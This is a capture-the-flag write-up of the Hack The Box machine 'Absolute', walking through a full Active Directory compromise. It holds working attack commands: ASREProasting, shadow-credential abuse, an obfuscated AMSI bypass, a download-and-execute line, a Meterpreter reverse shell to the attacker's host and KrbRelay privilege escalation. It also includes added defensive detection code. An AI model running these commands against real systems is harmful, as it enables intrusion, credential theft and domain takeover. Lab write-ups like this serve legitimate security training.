HTB - Absolute

Description
Absolute is an Insane Windows Active Directory machine that starts with a webpage displaying some images, whose metadata is used to create a wordlist of possible usernames that may exist on the machine. It turns out that one of these users doesn't require Pre-authentication, therefore posing a valuable target for an ASREProast attack. The discovered credentials are then used to enumerate LDAP and discover credentials for the user svc_smb, who has access to an SMB share containing a Windows binary. Performing dynamic analysis on the binary reveals that it tries to perform an LDAP connection to the Domain Controller with clear text credentials for the m.lovegod user, who owns the Network Audit group, which in turn has Generic Write over the winrm_user. Following this attack path and performing a shadow credential attack on the winrm_user, one can then WinRM and access the machine. Finally, the KrbRelay tool is used to add the winrm_user user to the Administrators group, leading to fully elevated privileges.
Enumeration
Nmap Scan
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $ nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/all-port-scan
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $ sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn -oN Nmap/udp-scan
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sCV $ip -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Absolute
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-01 18:41:45Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2023-07-17T21:11:52
|_Not valid after: 2024-07-16T21:11:52
|_ssl-date: 2024-11-01T18:42:39+00:00; +6h59m59s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-01T18:42:40+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2023-07-17T21:11:52
|_Not valid after: 2024-07-16T21:11:52
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-01T18:42:39+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2023-07-17T21:11:52
|_Not valid after: 2024-07-16T21:11:52
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-01T18:42:40+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2023-07-17T21:11:52
|_Not valid after: 2024-07-16T21:11:52
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 6h59m58s, deviation: 0s, median: 6h59m58s
| smb2-time:
| date: 2024-11-01T18:42:29
|_ start_date: N/A
Summary
* Open ports: 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389
* UDP open ports: 53,88,123,389
* Services: DNS - HTTP - KERBEROS - LDAP - LDAPS - winRM - SMB
* Important notes: DNS:dc.absolute.htb - Domain: absolute.htb - IIS httpd 10.0
hosts file
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $sudo sh -c "echo '$ip dc dc.absolute.htb absolute.htb' >> /etc/hosts"
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $tail -n 1 /etc/hosts
10.10.11.181 dc dc.absolute.htb absolute.htb
Service Enumeration
I will start this box differently by enumerating the HTTP service first.
HTTP Enumeration

I didn't find anything in the web app, so I tried to fuzz it, but there was nothing interesting here either, only a few common directories.

There are several images here, you can switch between them using the arrows.

If I look at the page source, I can see their locations and names.

When I visit the images directory at http://absolute.htb/images/, I get Access denied.

I will now switch to my terminal to download each image:
for i in {1..6};do wget -q http://absolute.htb/images/hero_$i.jpg;done

Looking at the image metadata, I see Author and Artist fields containing names.

I can use these names to create a wordlist and check for valid domain accounts.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute/images]
└──╼ $for image in $(ls); do exiftool $image | grep -i "Artist\|Author" | cut -d: -f2 | sort -u | tee -a users.txt;done
James Roberts
Michael Chaffrey
Donald Klay
Sarah Osvald
Jeffer Robinson
Nicole Smith
Then, I will mutate these names to create possible combinations of them
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute/images]
└──╼ $/opt/tools/username-anarchy/username-anarchy -i users.txt > users.lst
Brute-forcing Kerberos to find valid users:
kerbrute userenum -d absolute --dc dc.absolute.htb wordlists/users.lst -o wordlists/valid_users.lst

j.roberts
m.chaffrey
s.osvald
d.klay
j.robinson
n.smith
Foothold
With this list of valid users, I can move on to an ASREPRoasting attack:
nxc ldap dc -u valid_domain_users.lst -p '' -d absolute.htb --asreproast asrep.hashes

The hash is cracked successfully :))
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $hashcat -m 18200 hashes/asrep.hashes /usr/share/wordlists/rockyou.txt
..snip..
$krb5asrep$23$d.klay@ABSOLUTE.HTB:19d6d35c374ae22b5c9f38860c1eddf5$ba7a42c258f10291c22324fc98d8618deaf7e325d2a47ceea3ad7367cef4391c8f6c4cfb40b7e82785064bf952da2929213555bbe13b7d2edb0c4dc7da0b5496d8115c53535866328272d61f004106a834f03e176701302e51accb139155d1b7ba5311b82407d515a2cbd3e713176cdfde686d2fd6bf9e37e13f16d629dd607965638f16fe9795bf756449e36cecf3ed2b557c169bcee012d77bd904631e665a3f89f2737650fa4b6279fc9956c48ab55b20feff7531e2a66896b939fc6d4c25ded4c217a64f10d3cc97c1551a7b33b7bdabeb23e978e09c39ca101d180636a126d6419cea3a8661e32b117a:Darkmoonsky248girl
Session..........: hashcat
Status...........: Cracked
Now, I will make a to-do list so I don't forget anything in the enumeration phase:
* Check SMB share access
* Collect domain info with bloodhound.py
* Collect LDAP data with ldapdomaindump
* Check for winRM access using a BloodHound query
* Check for ADCS existence
* Check for common CVEs: GoldenPac, PetitPotam
* Check for LDAP signing, for a possible NTLM relay attack
* Check for password reuse
nxc smb dc -u 'd.klay' -p 'Darkmoonsky248girl' -M spider_plus
This error message means NTLM authentication is disabled, so I need to use Kerberos authentication instead.

I don't have permission on the interesting share folder, so I will move on.

I can't use ldapdomaindump since NTLM authentication is disabled, but bloodhound.py is smart enough to switch to Kerberos authentication automatically.
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $bloodhound-python -u 'd.klay' -p 'Darkmoonsky248girl' -ns 10.10.11.181 -d absolute.htb -c all
INFO: Found AD domain: absolute.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.absolute.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.absolute.htb
INFO: Found 18 users
INFO: Found 55 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Done in 420M 45S
PKI exists on the domain
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $nxc ldap dc -u 'd.klay' -p 'Darkmoonsky248girl' -M adcs -k
LDAP dc 389 DC [+] absolute.htb\d.klay:Darkmoonsky248girl
ADCS dc 389 DC [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS dc 389 DC Found PKI Enrollment Server: dc.absolute.htb
ADCS dc 389 DC Found CN: absolute-DC-CA
The target is not vulnerable to noPac, but it is to PetitPotam. I will note it down; I may need it later.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $nxc smb dc -u 'd.klay' -p 'Darkmoonsky248girl' -k -M nopac
SMB dc 445 DC [+] absolute.htb\d.klay:Darkmoonsky248girl
NOPAC dc 445 DC TGT with PAC size 1556
NOPAC dc 445 DC TGT without PAC size 1556
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $nxc smb dc -u 'd.klay' -p 'Darkmoonsky248girl' -k -M petitpotam
SMB dc 445 DC [+] absolute.htb\d.klay:Darkmoonsky248girl
PETITPOTAM dc 445 DC VULNERABLE
PETITPOTAM dc 445 DC Next step: https://github.com/topotam/PetitPotam
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $nxc ldap dc -u 'd.klay' -p 'Darkmoonsky248girl' -M ldap-checker -k
LDAP dc 389 DC [+] absolute.htb\d.klay:Darkmoonsky248girl
LDAP-CHE... dc 389 DC LDAP Signing NOT Enforced!
LDAP-CHE... dc 389 DC LDAPS Channel Binding is set to "NEVER"
I don't have winRM access to the box, either.

I want to list all the users in the domain, so I will use NetExec for that, and luckily I get a user's credentials from the description field.

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $nxc ldap dc -u 'svc_smb' -p 'AbsoluteSMBService123!' -k
LDAP dc 389 DC [+] absolute.htb\svc_smb:AbsoluteSMBService123!
With the two passwords I have, I will try password spraying against the users I just found:
* AbsoluteSMBService123!
* Darkmoonsky248girl
Unfortunately, I didn't get any additional account.
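The two weaknesses found so far, an account with Kerberos pre-authentication disabled (d.klay) and a password stored in a user's description (svc_smb), are both visible to a defender from the same LDAP attributes. The following Python audit is an added example, not part of the original write-up; it runs over constructed user entries shaped like the attributes an LDAP query for user objects would return, and the description wording and the extra accounts are invented.

```python
import re

# userAccountControl bits: pre-authentication not required (ASREP-roastable) and disabled.
DONT_REQ_PREAUTH = 0x400000
ACCOUNTDISABLE = 0x0002

# Constructed sample entries shaped like the attributes an LDAP query for user objects
# would return. d.klay's flag and svc_smb's password match the findings above; the
# description wording and the other accounts are invented.
SAMPLE_USERS = [
    {"sAMAccountName": "d.klay", "userAccountControl": 0x400200, "description": ""},
    {"sAMAccountName": "svc_smb", "userAccountControl": 0x10200,
     "description": "SMB service account - pwd: AbsoluteSMBService123!"},
    {"sAMAccountName": "m.lovegod", "userAccountControl": 0x200, "description": "Network audit lead"},
    {"sAMAccountName": "old_svc", "userAccountControl": 0x400202, "description": "retired 2021"},
]

# Words that usually sit next to a credential in free text, and a token filter for
# 'looks like a password' strings that have no such hint word.
CRED_HINT = re.compile(r"\b(pass(word)?|pwd|cred(ential)?s?)\b", re.IGNORECASE)
TOKEN = re.compile(r"\S{8,}")

def looks_like_secret(token: str) -> bool:
    """8+ chars drawing on at least three of: lower, upper, digit, symbol."""
    classes = (any(c.islower() for c in token), any(c.isupper() for c in token),
               any(c.isdigit() for c in token), any(not c.isalnum() for c in token))
    return sum(classes) >= 3

def audit_users(users):
    """Return (account, finding) pairs for the two weaknesses this box exposed."""
    findings = []
    for u in users:
        name, uac = u["sAMAccountName"], int(u["userAccountControl"])
        # A disabled account cannot be roasted (the KDC refuses it), so skip those.
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE:
            findings.append((name, "pre-auth not required (ASREP-roastable)"))
        desc = u.get("description") or ""
        if CRED_HINT.search(desc) or any(looks_like_secret(t) for t in TOKEN.findall(desc)):
            findings.append((name, "description may contain a credential"))
    return findings
```

Feed it the real entries from a bind with a low-privilege account: both attributes are readable by any authenticated user, which is exactly why they were found here.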

Checking the shares with the new user's credentials reveals that I have READ access on the Shared folder.

There are only 2 files in the Shared folder: compiler.sh and test.exe.
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $cat /tmp/nxc_hosted/nxc_spider_plus/dc.json
{
    "NETLOGON": {},
    "SYSVOL": {},
    "Shared": {
        "compiler.sh": {
            "atime_epoch": "2022-06-09 04:30:03",
            "ctime_epoch": "2022-06-08 09:20:32",
            "mtime_epoch": "2022-09-01 13:02:23",
            "size": "72 B"
        },
        "test.exe": {
            "atime_epoch": "2022-06-09 04:30:03",
            "ctime_epoch": "2022-06-08 00:13:07",
            "mtime_epoch": "2022-09-01 13:02:23",
            "size": "66 KB"
        }
    }
}
Connect to the Shared folder and download the files after getting a Kerberos ticket for easy access:
kinit svc_smb
impacket-smbclient 'absolute.htb/svc_smb:AbsoluteSMBService123!@dc.absolute.htb' -k -no-pass


Lateral Movement
I will now switch to a Windows VM to run this program, or decompile it with dnSpy.
When I run the file while Wireshark captures the network traffic, several DNS queries come into play.

It tries to resolve _ldap._tcp.dc.absolute.htb

I will try the machine's IP 10.10.11.182 and run the program again.
Make sure you are connected to the HTB network with the .ovpn file. I was using the OpenVPN GUI client.

It performs an LDAP bind.

Here are the credentials it sends over the network: mlovegod:AbsoluteLDAP2022!

There isn't a user named mlovegod, but there is m.lovegod.

He Owns the Network Audit group.

The svc_audit user is a member of Network Audit, and the group has GenericWrite over winrm_user.

Only the winrm_user user can access the machine via winRM.

So the attack path is:
* Abuse ownership of the Network Audit group to give myself GenericAll rights, then add myself to this group and gain its privileges.
* Abuse GenericWrite to add shadow credentials to, or change the password of, winrm_user.
* Access the machine using winrm_user.
./bloodyAD -u m.lovegod -p 'AbsoluteLDAP2022!' -d absolute.htb --dc-ip 10.10.11.181 -k --host dc.absolute.htb add genericAll "CN=NETWORK AUDIT,CN=USERS,DC=ABSOLUTE,DC=HTB" m.lovegod

python3 powerview.py absolute.htb/m.lovegod:'AbsoluteLDAP2022!'@dc.absolute.htb -k
Add-DomainGroupMember -Identity "Network audit" -Members m.lovegod

kinit m.lovegod
KRB5CCNAME=/tmp/krb5cc_1000 certipy shadow auto -username m.lovegod@absolute.htb -account winrm_user -k -target dc.absolute.htb
Or, alternatively:
python3 pywhisker.py -d absolute.htb -u m.lovegod -p 'AbsoluteLDAP2022!' --target winrm_user --action add -k
python3 gettgtpkinit.py -cert-pfx file.pfx -pfx-pass <pass> absolute.htb/winrm_user winrm.ccache
KRB5CCNAME=winrm.ccache python3 getnthash.py -key <aes256_key> absolute.htb/winrm_user
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $ KRB5CCNAME=/tmp/krb5cc_1000 certipy shadow auto -username m.lovegod@absolute.htb -account winrm_user -k -target dc.absolute.htb
..snip..
[*] Adding Key Credential with device ID '210e97b1-ca38-adea-f902-1e30d350421a' to the Key Credentials for 'winrm_user'
[*] Successfully added Key Credential with device ID '210e97b1-ca38-adea-f902-1e30d350421a' to the Key Credentials for 'winrm_user'
[*] Authenticating as 'winrm_user' with the certificate
[*] Using principal: winrm_user@absolute.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_user.ccache'
[*] Trying to retrieve NT hash for 'winrm_user'
[*] Restoring the old Key Credentials for 'winrm_user'
[*] Successfully restored the old Key Credentials for 'winrm_user'
[*] NT hash for 'winrm_user': 8738c7413a5da3bc1d083efc0ab06cb2
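The certipy output above shows the two directory writes a shadow-credential attack leaves behind: a value added to winrm_user's msDS-KeyCredentialLink by a different principal, then the old value restored a few seconds later. The Python detection below is an added example, not from the write-up; it runs over constructed, already-parsed Directory Service Changes (Event ID 5136) records, and the timestamps and subject names in them are invented.

```python
from datetime import datetime, timedelta

# Event 5136 (Directory Service Changes) fields used here. OperationType holds
# Windows resource strings: %%14674 = Value Added, %%14675 = Value Deleted.
KEYCRED_ATTR = "msDS-KeyCredentialLink"
VALUE_ADDED, VALUE_DELETED = "%%14674", "%%14675"

# Constructed sample records (invented times and subjects) mirroring the certipy run:
# m.lovegod adds a KeyCredential to winrm_user, then restores the old value.
# The DC$ self-write is the benign case (a machine registering its own key).
SAMPLE_EVENTS = [
    {"time": "2024-11-02T01:55:10", "SubjectUserName": "m.lovegod",
     "ObjectDN": "CN=winrm_user,CN=Users,DC=absolute,DC=htb",
     "AttributeLDAPDisplayName": KEYCRED_ATTR, "OperationType": VALUE_ADDED},
    {"time": "2024-11-02T01:55:14", "SubjectUserName": "m.lovegod",
     "ObjectDN": "CN=winrm_user,CN=Users,DC=absolute,DC=htb",
     "AttributeLDAPDisplayName": KEYCRED_ATTR, "OperationType": VALUE_DELETED},
    {"time": "2024-11-02T02:10:00", "SubjectUserName": "DC$",
     "ObjectDN": "CN=DC,OU=Domain Controllers,DC=absolute,DC=htb",
     "AttributeLDAPDisplayName": KEYCRED_ATTR, "OperationType": VALUE_ADDED},
    {"time": "2024-11-02T02:12:00", "SubjectUserName": "m.lovegod",
     "ObjectDN": "CN=winrm_user,CN=Users,DC=absolute,DC=htb",
     "AttributeLDAPDisplayName": "description", "OperationType": VALUE_ADDED},
]

def _object_name(dn: str) -> str:
    """First RDN value, e.g. 'winrm_user' from 'CN=winrm_user,CN=Users,...'."""
    return dn.split(",", 1)[0].split("=", 1)[1]

def detect_shadow_credentials(events, restore_window=timedelta(minutes=10)):
    """Flag msDS-KeyCredentialLink additions made by a principal other than the
    object itself. A self-write (machine or user enrolling its own key) is normal;
    an add by someone else, especially one followed by a delete from the same
    subject (the tool 'restoring' the attribute), is the shadow-credential pattern."""
    keycred = [e for e in events if e["AttributeLDAPDisplayName"] == KEYCRED_ATTR]
    alerts = []
    for e in keycred:
        target = _object_name(e["ObjectDN"])
        if e["OperationType"] != VALUE_ADDED:
            continue
        if e["SubjectUserName"].rstrip("$").lower() == target.lower():
            continue  # self-service key registration
        t0 = datetime.fromisoformat(e["time"])
        restored = any(
            d["OperationType"] == VALUE_DELETED and d["ObjectDN"] == e["ObjectDN"]
            and d["SubjectUserName"] == e["SubjectUserName"]
            and timedelta(0) <= datetime.fromisoformat(d["time"]) - t0 <= restore_window
            for d in keycred)
        alerts.append((e["SubjectUserName"], target,
                       "high: add then restore" if restored else "medium: add by other principal"))
    return alerts
```

Event 5136 is only emitted when Directory Service Changes auditing is enabled and the target object's SACL audits Write Property, so confirm that on the Users container and on computer objects before relying on this.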
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $KRB5CCNAME=`pwd`/winrm_user.ccache evil-winrm -i dc -r absolute.htb
*Evil-WinRM* PS C:\Users\winrm_user\Documents> type ..\Desktop\user.txt
18dcdc1a7cf18d75167fbebf08f483b5
User Flag: 18dcdc1a7cf18d75167fbebf08f483b5
Privilege Escalation
After getting access to the machine, I want to upgrade my shell to a persistent one. I will use Meterpreter because I'm comfortable with it.
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.12 lport=9001 -f psh -o shell.ps1
[Ref].Assembly.GetType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA==')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwA=')))).SetValue($null,$true)
iex(iwr -UseBasicParsing 10.10.16.12/shell.ps1)
┌─[kali@parrot]─[~/tools]
└──╼ $ sudo msfconsole -x 'use exploit/multi/handler;set lhost 10.10.16.12;set lport 9001;set payload windows/x64/meterpreter/reverse_tcp; run'
[*] Started reverse TCP handler on 0.0.0.0:9001
[*] Sending stage (200774 bytes) to 10.10.11.181
[*] Meterpreter session 1 opened (10.10.16.12:9001 -> 10.10.11.181:58987) at 2024-11-02 02:08:21 -0400
(Meterpreter 1)(C:\Windows\system32) >
Since I found at the beginning that LDAP signing is not enforced, I can perform relaying against it with my access to the machine. I will use the KrbRelay repo for this.
Following the repo, I can use several options here.

CLSID of Windows 2019

First, we need to get the port number that allows SYSTEM
.\CheckPort.exe
..snip..
[*] SYSTEM Is allowed through port 10
I need to run the exploit under a different logon type: 2 or 9.
.\RunasCs.exe m.lovegod 'AbsoluteLDAP2022!' -d absolute.htb -l 9 'KrbRelay.exe -spn ldap/dc.absolute.htb -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -port 10'
.\RunasCs.exe d.klay Darkmoonsky248girl -l 9 ".\KrbRelay.exe -spn ldap/dc.absolute.htb -clsid 8F5DF053-3013-4dd8-B5F4-88214E81C0CF -add-groupmember administrators winrm_user"

PS C:\Users\Administrator\Desktop> type root.txt
Root Flag: adce565cxxxxxxxxxxxxxxxxxx